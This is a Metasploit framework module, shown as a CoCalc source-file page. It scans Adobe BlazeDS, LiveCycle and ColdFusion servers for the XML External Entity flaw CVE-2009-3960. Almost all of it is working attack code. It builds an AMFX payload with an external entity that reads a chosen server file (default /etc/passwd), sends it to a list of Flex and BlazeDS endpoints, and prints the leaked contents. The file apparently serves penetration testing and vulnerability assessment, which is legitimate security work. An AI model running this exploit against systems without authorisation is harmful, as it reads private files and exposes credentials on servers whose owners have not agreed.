Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/adobe_xml_inject.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Scanner

9


10
  def initialize

11
    super(

12
      'Name' => 'Adobe XML External Entity Injection',

13
      'Description' => %q{

14
          Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and

15
        earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and

16
        2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

17
      },

18
      'References' => [

19
        [ 'CVE', '2009-3960' ],

20
        [ 'OSVDB', '62292' ],

21
        [ 'BID', '38197' ],

22
        [ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf' ],

23
        [ 'URL', 'https://www.adobe.com/support/security/bulletins/apsb10-05.html'],

24
      ],

25
      'Author' => [ 'CG' ],

26
      'License' => MSF_LICENSE

27
      )

28


29
    register_options(

30
      [

31
        Opt::RPORT(8400),

32
        OptString.new('FILE', [ true, "File to read", '/etc/passwd']),

33
      ]

34
    )

35
  end

36


37
  def run_host(ip)

38
    path = [

39
      "/flex2gateway/",

40
      "/flex2gateway/http", # ColdFusion 9 (disabled by default), works on some CF 8 though :-)

41
      "/flex2gateway/httpsecure", # ColdFusion 9 (disabled by default) SSL

42
      "/flex2gateway/cfamfpolling",

43
      "/flex2gateway/amf",

44
      "/flex2gateway/amfpolling",

45
      "/messagebroker/http",

46
      "/messagebroker/httpsecure", # SSL

47
      "/blazeds/messagebroker/http", # Blazeds 3.2

48
      "/blazeds/messagebroker/httpsecure", # SSL

49
      "/samples/messagebroker/http", # Blazeds 3.2

50
      "/samples/messagebroker/httpsecure", # Blazeds 3.2 SSL

51
      "/lcds/messagebroker/http", # LCDS

52
      "/lcds/messagebroker/httpsecure", # LCDS -- SSL

53
      "/lcds-samples/messagebroker/http", # LCDS

54
      "/lcds-samples/messagebroker/httpsecure", # LCDS -- SSL

55
    ]

56


57
    postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?>"

58
    postrequest << "<\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"

59
    postrequest << "<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">"

60
    postrequest << "<body><object type=\"flex.messaging.messages.CommandMessage\"><traits>"

61
    postrequest << "<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>"

62
    postrequest << "<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>"

63
    postrequest << "<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>"

64
    postrequest << "<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>"

65
    postrequest << "<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"

66


67
    path.each do |check|

68
      res = send_request_cgi({

69
        'uri' => check,

70
        'method' => 'POST',

71
        'version' => '1.1',

72
        'Content-Type' => 'application/x-amf',

73
        'data' => postrequest

74
      }, 25)

75


76
      if (res.nil?)

77
        print_error("no response for #{ip}:#{rport} #{check}")

78
      elsif (res.code == 200 and res.body =~ /\<\?xml version\="1.0" encoding="utf-8"\?\>/)

79
        print_status("#{rhost}:#{rport} #{check} #{res.code}\n #{res.body}")

80
      elsif (res and res.code == 302 or res.code == 301)

81
        print_status(" Received 302 to  #{res.headers['Location']} for #{check}")

82
      else

83
        print_error("#{res.code} for #{check}")

84
        # ''

85
      end

86
    end

87
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError => e

88
    print_error(e.message)

89
  rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e

90
    print_error(e.message)

91
  end

92
end

93


94
# set FILE /proc/sys/kernel/osrelease

95
# set FILE /proc/sys/kernel/hostname

96


97